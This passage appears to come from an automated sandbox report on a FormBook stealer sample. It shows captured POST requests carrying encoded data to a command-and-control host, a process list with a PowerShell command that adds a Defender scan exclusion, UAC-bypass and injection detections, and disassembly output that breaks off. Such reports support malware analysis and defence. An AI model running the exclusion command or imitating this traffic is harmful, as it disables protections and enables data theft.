                                            Data Raw: 5a 36 5a 54 47 3d 74 30 6b 52 46 50 79 48 2b 7a 79 7a 58 66 49 57 39 52 57 6d 4d 67 59 75 30 5a 67 54 61 32 62 41 50 69 35 43 37 78 57 38 30 52 33 64 38 79 33 50 51 49 41 45 47 65 41 4f 51 2b 79 58 69 6d 42 36 34 69 77 70 55 2f 76 59 38 36 47 34 36 30 69 38 72 78 39 34 5a 6f 73 2f 4c 70 36 6f 6e 46 44 57 2b 52 66 53 2f 34 30 6c 57 4e 4a 54 2b 64 79 52 72 70 31 38 57 57 55 69 67 68 41 43 36 4c 74 35 77 49 4f 4e 49 4f 44 47 39 70 68 77 44 44 4b 32 7a 5a 50 75 52 42 49 51 62 6e 64 4b 55 39 38 68 59 6b 31 33 74 41 4f 43 5a 36 36 54 4e 35 71 44 39 45 70 58 73 7a 67 53 54 73 71 51 78 56 2f 55 55 79 76 7a 2f 73 49 49 73 72 2b 52
                                            Data Ascii: Z6ZTG=t0kRFPyH+zyzXfIW9RWmMgYu0ZgTa2bAPi5C7xW80R3d8y3PQIAEGeAOQ+yXimB64iwpU/vY86G460i8rx94Zos/Lp6onFDW+RfS/40lWNJT+dyRrp18WWUighAC6Lt5wIONIODG9phwDDK2zZPuRBIQbndKU98hYk13tAOCZ66TN5qD9EpXszgSTsqQxV/UUyvz/sIIsr+R
                                            Jul 3, 2024 18:54:53.154165983 CEST409INHTTP/1.1 301 Moved Permanently
                                            Content-Type: application/binary
                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                            Pragma: no-cache
                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                            Date: Wed, 03 Jul 2024 16:54:53 GMT
                                            Location: https://www.bayviewcribbage.com/odz6/
                                            Server: ESF
                                            Content-Length: 0
                                            X-XSS-Protection: 0
                                            X-Frame-Options: SAMEORIGIN
                                            X-Content-Type-Options: nosniff
                                            Connection: close


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            34192.168.2.649760142.250.185.83805680C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 3, 2024 18:54:54.933614016 CEST775OUTPOST /odz6/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate
                                            Host: www.bayviewcribbage.com
                                            Origin: http://www.bayviewcribbage.com
                                            Connection: close
                                            Content-Type: application/x-www-form-urlencoded
                                            Cache-Control: no-cache
                                            Content-Length: 234
                                            Referer: http://www.bayviewcribbage.com/odz6/
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Data Raw: 5a 36 5a 54 47 3d 74 30 6b 52 46 50 79 48 2b 7a 79 7a 59 61 41 57 75 32 43 6d 4b 41 59 78 78 5a 67 54 51 57 62 62 50 69 6c 43 37 30 75 4b 30 6a 54 64 39 53 6e 50 58 4e 30 45 42 65 41 4f 59 65 79 59 73 47 41 34 34 69 4d 51 55 39 4c 59 38 37 6d 34 36 31 53 38 72 47 41 75 59 34 73 39 48 4a 36 71 36 56 44 57 2b 52 66 53 2f 34 68 4b 57 4a 6c 54 2b 4f 71 52 72 49 31 2f 56 57 56 51 6a 68 41 43 78 72 74 69 77 49 4f 56 49 4c 61 6a 39 72 70 77 44 47 32 32 79 4d 76 74 59 42 49 4b 57 48 63 65 55 73 56 61 66 6c 31 36 72 47 6e 6e 41 4b 57 6f 46 76 72 5a 68 33 70 30 2b 6a 41 51 54 75 79 69 78 31 2f 2b 57 79 58 7a 74 37 45 76 6a 66 62 79 41 58 4d 49 66 31 53 41 69 38 34 72 61 37 6b 6c 41 4b 42 34 78 41 3d 3d
                                            Data Ascii: Z6ZTG=t0kRFPyH+zyzYaAWu2CmKAYxxZgTQWbbPilC70uK0jTd9SnPXN0EBeAOYeyYsGA44iMQU9LY87m461S8rGAuY4s9HJ6q6VDW+RfS/4hKWJlT+OqRrI1/VWVQjhACxrtiwIOVILaj9rpwDG22yMvtYBIKWHceUsVafl16rGnnAKWoFvrZh3p0+jAQTuyix1/+WyXzt7EvjfbyAXMIf1SAi84ra7klAKB4xA==
                                            Jul 3, 2024 18:54:55.659480095 CEST409INHTTP/1.1 301 Moved Permanently
                                            Content-Type: application/binary
                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                            Pragma: no-cache
                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                            Date: Wed, 03 Jul 2024 16:54:55 GMT
                                            Location: https://www.bayviewcribbage.com/odz6/
                                            Server: ESF
                                            Content-Length: 0
                                            X-XSS-Protection: 0
                                            X-Frame-Options: SAMEORIGIN
                                            X-Content-Type-Options: nosniff
                                            Connection: close


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            35192.168.2.649761142.250.185.83805680C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 3, 2024 18:54:57.465045929 CEST1788OUTPOST /odz6/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate
                                            Host: www.bayviewcribbage.com
                                            Origin: http://www.bayviewcribbage.com
                                            Connection: close
                                            Content-Type: application/x-www-form-urlencoded
                                            Cache-Control: no-cache
                                            Content-Length: 1246
                                            Referer: http://www.bayviewcribbage.com/odz6/
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Data Raw: 5a 36 5a 54 47 3d 74 30 6b 52 46 50 79 48 2b 7a 79 7a 59 61 41 57 75 32 43 6d 4b 41 59 78 78 5a 67 54 51 57 62 62 50 69 6c 43 37 30 75 4b 30 6a 62 64 38 6b 72 50 58 71 59 45 41 65 41 4f 48 75 79 49 73 47 41 35 34 69 55 55 55 39 33 49 38 2f 57 34 38 6a 6d 38 74 79 55 75 52 34 73 39 50 70 36 70 6e 46 44 44 2b 51 76 57 2f 34 78 4b 57 4a 6c 54 2b 50 61 52 38 4a 31 2f 5a 32 55 69 67 68 41 57 36 4c 73 4e 77 49 57 46 49 4c 76 57 39 62 4a 77 45 6d 47 32 2b 59 50 74 41 52 49 4d 52 48 63 57 55 73 4a 46 66 6c 6f 44 72 43 6d 43 41 4a 4b 6f 56 71 4f 69 32 57 74 34 67 79 51 77 4f 50 43 42 35 46 4b 4d 55 41 6e 75 72 59 6f 50 6f 64 6a 6c 45 43 6f 35 58 30 66 37 76 74 34 63 53 65 64 4d 4d 4c 55 49 31 66 41 2f 69 36 75 64 70 67 57 62 50 45 50 4a 44 75 31 30 48 68 73 70 57 42 50 79 47 62 4c 32 7a 65 4f 30 77 31 43 33 71 75 6d 76 69 53 70 6c 39 4d 71 4d 2f 59 43 6d 63 53 67 55 47 75 49 74 31 76 65 71 30 53 36 70 30 45 4f 6e 73 41 4f 4b 52 32 41 30 4e 57 4a 75 54 5a 33 77 57 78 7a 5a 44 33 44 4a 2b 4f 42 4b 6d 33 33 77 [TRUNCATED]
                                            Data Ascii: Z6ZTG=t0kRFPyH+zyzYaAWu2CmKAYxxZgTQWbbPilC70uK0jbd8krPXqYEAeAOHuyIsGA54iUUU93I8/W48jm8tyUuR4s9Pp6pnFDD+QvW/4xKWJlT+PaR8J1/Z2UighAW6LsNwIWFILvW9bJwEmG2+YPtARIMRHcWUsJFfloDrCmCAJKoVqOi2Wt4gyQwOPCB5FKMUAnurYoPodjlECo5X0f7vt4cSedMMLUI1fA/i6udpgWbPEPJDu10HhspWBPyGbL2zeO0w1C3qumviSpl9MqM/YCmcSgUGuIt1veq0S6p0EOnsAOKR2A0NWJuTZ3wWxzZD3DJ+OBKm33wC9vvxCdwCn0hc8L0OTpUTgHjlKmHJsOSDhu/3nclNY29o9N2FFbYQZCe3p64RLKPNTcPUg2tsJw+KPdk/GGBOe/tmw9S467PnWh6JaiKjNahNELbWxa92XkX88w/5+kVuROe4XrCJ9fXy7fBWUzGfgclknelG+N4VTjiCCAlTpXLAK3LhEGpighYPQlrDVsNVeOwQNatDBQg2PYYmhHJ7tlrR7JMknYOe2sdl5HCw2dlTlT7fZfUOOv5iApGn2D1TNats92j00rPYd5aQBPPZDxv8FuIgG85TASJucAXPkfkXC+Udkh6AA30jJTSTOMdC+jG97KVfkgN5jCnGzK7kgSv8tqay33k/GwK5/ruM90NCPkyK89ZBOOdTFlRMzBoS8WJ88RUKkmvUTbo2xGKvmglq4Z/dSPR8NQW9ItsTQ7ZsEUf7nO9syBRjlzswM4+aSmAGQmTNVXuDOfNEExV9bWMY1ErAYgXQK+qOBHRt6d5txrpyLZfUAoSaNS7fnpObg/4iUSYV5YTTXjAVAeqRz4/nwKAGOY1TSnhXgcC3Ynhs1+9QNEs6bkTx1Z0U/LOgLfz96uCU9IpKj1MbzqbyObwgBmbvOe/I2mprBYZQHttkoaEX20ufH+tqZeC7yGi29+qKWro8u7wCSiS4Qz0BEAAsXcfwWVjj7 [TRUNCATED]
                                            Jul 3, 2024 18:54:58.193600893 CEST409INHTTP/1.1 301 Moved Permanently
                                            Content-Type: application/binary
                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                            Pragma: no-cache
                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                            Date: Wed, 03 Jul 2024 16:54:58 GMT
                                            Location: https://www.bayviewcribbage.com/odz6/
                                            Server: ESF
                                            Content-Length: 0
                                            X-XSS-Protection: 0
                                            X-Frame-Options: SAMEORIGIN
                                            X-Content-Type-Options: nosniff
                                            Connection: close


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            36192.168.2.649762142.250.185.83805680C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 3, 2024 18:54:59.995413065 CEST485OUTGET /odz6/?Z6ZTG=g2MxG/W7xhmOYso67RKSNHAiz8R/MmCgHQBJyh6P0RXX/Tr+d5ouA/hJc9ntyVwHyC0jENaFifi0j0/YggYyTtohP/rQs3Pv13bgnK1VWNIV+aS38IFIZFluiy4+zt0Ak7+zX+w=&3pSl=bXiTJHhxyN HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Host: www.bayviewcribbage.com
                                            Connection: close
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Jul 3, 2024 18:55:00.746496916 CEST570INHTTP/1.1 301 Moved Permanently
                                            Content-Type: application/binary
                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                            Pragma: no-cache
                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                            Date: Wed, 03 Jul 2024 16:55:00 GMT
                                            Location: https://www.bayviewcribbage.com/odz6/?Z6ZTG=g2MxG/W7xhmOYso67RKSNHAiz8R/MmCgHQBJyh6P0RXX/Tr+d5ouA/hJc9ntyVwHyC0jENaFifi0j0/YggYyTtohP/rQs3Pv13bgnK1VWNIV+aS38IFIZFluiy4+zt0Ak7+zX+w%3D&3pSl=bXiTJHhxyN
                                            Server: ESF
                                            Content-Length: 0
                                            X-XSS-Protection: 0
                                            X-Frame-Options: SAMEORIGIN
                                            X-Content-Type-Options: nosniff
                                            Connection: close


                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            High Level Behavior Distribution

                                            Click to dive into process behavior distribution

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Target ID:0
                                            Start time:12:51:55
                                            Start date:03/07/2024
                                            Path:C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe"
                                            Imagebase:0x1df09ec0000
                                            File size:2'928'646 bytes
                                            MD5 hash:0D866E84B1B42F3B924D671DB5B3B40E
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2455500615.000001DF0C0D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:1
                                            Start time:12:51:55
                                            Start date:03/07/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff66e660000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:3
                                            Start time:12:51:56
                                            Start date:03/07/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe" -Force
                                            Imagebase:0x7ff6e3d50000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:4
                                            Start time:12:51:56
                                            Start date:03/07/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff66e660000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:5
                                            Start time:12:51:57
                                            Start date:03/07/2024
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                            Wow64 process (32bit):
                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                                            Imagebase:
                                            File size:2'141'552 bytes
                                            MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:false

                                            General

                                            Target ID:6
                                            Start time:12:51:57
                                            Start date:03/07/2024
                                            Path:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
                                            Imagebase:0x910000
                                            File size:166'912 bytes
                                            MD5 hash:A7790328035BBFCF041A6D815F9C28DF
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2322232096.00000000035F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.2322232096.00000000035F0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2321692626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.2321692626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2322275427.00000000040C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.2322275427.00000000040C0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                            Reputation:moderate
                                            Has exited:true

                                            General

                                            Target ID:9
                                            Start time:12:51:57
                                            Start date:03/07/2024
                                            Path:C:\Windows\System32\WerFault.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\WerFault.exe -u -p 1512 -s 1456
                                            Imagebase:0x7ff710020000
                                            File size:570'736 bytes
                                            MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:10
                                            Start time:12:52:00
                                            Start date:03/07/2024
                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                            Imagebase:0x7ff717f30000
                                            File size:496'640 bytes
                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                            Has elevated privileges:true
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:11
                                            Start time:12:52:10
                                            Start date:03/07/2024
                                            Path:C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe"
                                            Imagebase:0xa70000
                                            File size:140'800 bytes
                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3945837611.00000000038C0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3945837611.00000000038C0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                            Reputation:high
                                            Has exited:false

                                            General

                                            Target ID:13
                                            Start time:12:52:12
                                            Start date:03/07/2024
                                            Path:C:\Windows\SysWOW64\sc.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\SysWOW64\sc.exe"
                                            Imagebase:0x890000
                                            File size:61'440 bytes
                                            MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.3944875828.0000000003180000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.3944875828.0000000003180000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.3945190684.00000000032D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.3945190684.00000000032D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                            Reputation:moderate
                                            Has exited:false

                                            General

                                            Target ID:14
                                            Start time:12:52:24
                                            Start date:03/07/2024
                                            Path:C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe"
                                            Imagebase:0xa70000
                                            File size:140'800 bytes
                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.3948817261.00000000057D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.3948817261.00000000057D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                            Reputation:high
                                            Has exited:false

                                            General

                                            Target ID:15
                                            Start time:12:52:28
                                            Start date:03/07/2024
                                            Path:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
                                            Imagebase:0x910000
                                            File size:166'912 bytes
                                            MD5 hash:A7790328035BBFCF041A6D815F9C28DF
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:false

                                            General

                                            Target ID:16
                                            Start time:12:52:29
                                            Start date:03/07/2024
                                            Path:C:\Windows\SysWOW64\unregmp2.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon
                                            Imagebase:0xbf0000
                                            File size:214'528 bytes
                                            MD5 hash:51629AAAF753C6411D0B7D37620B7A83
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:17
                                            Start time:12:52:29
                                            Start date:03/07/2024
                                            Path:C:\Windows\System32\unregmp2.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT
                                            Imagebase:0x7ff6d64f0000
                                            File size:265'216 bytes
                                            MD5 hash:A6FC8CE566DEC7C5873CB9D02D7B874E
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:20
                                            Start time:12:52:37
                                            Start date:03/07/2024
                                            Path:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
                                            Imagebase:0x910000
                                            File size:166'912 bytes
                                            MD5 hash:A7790328035BBFCF041A6D815F9C28DF
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:21
                                            Start time:12:52:37
                                            Start date:03/07/2024
                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                            Imagebase:0x7ff728280000
                                            File size:676'768 bytes
                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Disassembly

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:9.6%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:6
                                              Total number of Limit Nodes:0
                                              execution_graph 16839 7ffd34680921 16840 7ffd3468094f FreeConsole 16839->16840 16842 7ffd346809ce 16840->16842 16835 7ffd3468350a 16836 7ffd34683519 VirtualProtect 16835->16836 16838 7ffd346835f1 16836->16838

                                              Executed Functions

                                              Function 00007FFD34689828 Relevance: 5.4, Strings: 3, Instructions: 1660COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2460457922.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd34680000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @ls4$zs4$zs4
                                              • API String ID: 0-2956415519
                                              • Opcode ID: f11fc4b0db5b02894026a65cfde83fe4d87e34e04cbd7ddcadf602d6a3174c38
                                              • Instruction ID: 02d958df96629d6d9b14e3f36616c33ce607d42fe938e93839a1f4ad629f0b65
                                              • Opcode Fuzzy Hash: f11fc4b0db5b02894026a65cfde83fe4d87e34e04cbd7ddcadf602d6a3174c38
                                              • Instruction Fuzzy Hash: 86C2A271A09A598FEBA8DF18C4A5AF977E1FF56300F1400BAD14EC7292DE78AC41DB41
                                              Function 00007FFD3468EF49 Relevance: 4.2, Strings: 2, Instructions: 1735COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2460457922.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd34680000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: `Os4$`Os4
                                              • API String ID: 0-1505468668
                                              • Opcode ID: 3603b1d0092b35040512eeb51261b8bc0b9e0304f19f846a808823c380195e4c
                                              • Instruction ID: 2faa429ace6a69dc323063ed9ad9f0a99d48adcc3bfb95c444faba2039cd5704
                                              • Opcode Fuzzy Hash: 3603b1d0092b35040512eeb51261b8bc0b9e0304f19f846a808823c380195e4c
                                              • Instruction Fuzzy Hash: 1DC2563060CB594FE79DDF2884A14B5B7E1FF96301B1445BEE58AC72A6DE38E842C781
                                              Function 00007FFD34693F62 Relevance: 3.1, Strings: 2, Instructions: 593COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 798 7ffd34693f62-7ffd34693fc0 801 7ffd34694031-7ffd3469403b 798->801 802 7ffd34693fc2-7ffd34693fc4 798->802 803 7ffd3469403d-7ffd3469403e 801->803 804 7ffd34693fc6 802->804 805 7ffd34694040-7ffd3469404b 802->805 803->805 806 7ffd34693fc8-7ffd34693fcc 804->806 807 7ffd3469400c-7ffd3469400f 804->807 812 7ffd3469404d-7ffd34694056 805->812 806->803 811 7ffd34693fce-7ffd34693fd1 806->811 808 7ffd3469408b-7ffd34694097 807->808 809 7ffd34694011 807->809 816 7ffd34694098-7ffd346940a8 808->816 814 7ffd34694057-7ffd3469405c 809->814 815 7ffd34694013-7ffd34694017 809->815 811->812 813 7ffd34693fd3 811->813 812->814 817 7ffd34693fd5-7ffd3469400b 813->817 818 7ffd34694019-7ffd3469401c 813->818 819 7ffd346940d8-7ffd346940d9 814->819 820 7ffd3469405d 814->820 815->818 821 7ffd34694088-7ffd3469408a 815->821 831 7ffd346940a9-7ffd346940b2 816->831 817->807 834 7ffd3469407c-7ffd34694086 817->834 818->816 824 7ffd3469401e 818->824 825 7ffd346940da-7ffd346940e8 819->825 822 7ffd346940ce-7ffd346940d7 820->822 823 7ffd3469405e-7ffd34694063 820->823 821->808 822->819 830 7ffd34694064-7ffd34694069 823->830 823->831 829 7ffd34694020-7ffd3469402f 824->829 824->830 839 7ffd346940ea-7ffd346940f9 825->839 829->801 830->825 835 7ffd3469406b-7ffd3469406e 830->835 832 7ffd3469412e 831->832 833 7ffd346940b3 831->833 842 7ffd34694130-7ffd34694132 832->842 837 7ffd34694124-7ffd3469412d 833->837 838 7ffd346940b4-7ffd346940b5 833->838 834->821 835->839 840 7ffd34694070 835->840 837->832 843 7ffd346940b6-7ffd346940b7 838->843 846 7ffd34694175 839->846 847 7ffd346940fa 839->847 840->843 844 7ffd34694072-7ffd34694079 840->844 845 7ffd34694133-7ffd34694138 842->845 843->845 850 7ffd346940b8 843->850 844->834 853 7ffd34694139-7ffd3469413e 845->853 852 7ffd34694177-7ffd34694179 846->852 848 7ffd3469416b-7ffd34694174 847->848 849 7ffd346940fb-7ffd346940fe 847->849 848->846 854 7ffd3469417a-7ffd3469417f 849->854 855 7ffd346940ff 849->855 850->853 856 7ffd346940b9 850->856 852->854 857 7ffd346941ba-7ffd346941bb 853->857 858 7ffd3469413f 853->858 860 7ffd34694180-7ffd34694185 854->860 855->860 861 7ffd34694100 855->861 856->855 862 7ffd346940ba-7ffd346940bf 856->862 864 7ffd346941bc-7ffd346941be 857->864 859 7ffd34694140-7ffd34694143 858->859 865 7ffd34694145 859->865 866 7ffd346941bf-7ffd346941cb 859->866 870 7ffd34694186 860->870 871 7ffd34694201 860->871 867 7ffd34694146-7ffd3469414b 861->867 868 7ffd34694101-7ffd34694106 861->868 862->842 869 7ffd346940c1-7ffd346940c4 862->869 864->866 865->867 872 7ffd3469418b 865->872 877 7ffd346941cc 866->877 867->864 873 7ffd3469414d-7ffd34694150 867->873 868->852 874 